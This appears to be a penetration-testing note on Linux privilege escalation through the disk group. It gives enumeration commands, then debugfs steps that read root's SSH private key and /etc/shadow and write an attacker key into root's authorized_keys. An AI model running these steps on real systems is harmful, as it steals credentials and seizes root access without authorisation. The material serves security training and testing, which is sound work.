Members of the disk group are able to access raw block devices exposed under /dev.
This includes physical disks and disk partitions that back the operating system. By interacting directly with these devices, a user can bypass normal filesystem permissions and inspect or modify data regardless of its ownership.
When enumerating the disk group, try to identify:
- Membership in the
diskgroup - Accessible block devices
- Operating system partitions
- Sensitive files on mounted filesystems
- SSH keys
- Password hashes
- Opportunities to modify the filesystem directly
Enumeration
Determine the current user's groups:
id
List available block devices:
lsblk
Display disk partitions:
sudo fdisk -l
Inspect available devices:
ls -lah /dev
Interesting findings include:
- Membership in the
diskgroup - The operating system partition (commonly
/dev/sda1) - Additional mounted disks
- Backup volumes
- Recovery partitions
Once membership in the disk group has been identified, determine whether the operating system partition can be accessed directly using debugfs.
Exploit
- Verify membership in the
diskgroup - Identify the operating system partition
- Open the partition using
debugfs - Enumerate sensitive files
- Retrieve credentials or modify the filesystem
- Leverage the obtained access to achieve privilege escalation
Open the filesystem:
debugfs /dev/sda1
Read sensitive files:
cat /root/.ssh/id_rsa
cat /etc/shadow
Add an SSH public key to root's account:
write attacker.pub /root/.ssh/authorized_keys
Exit debugfs:
quit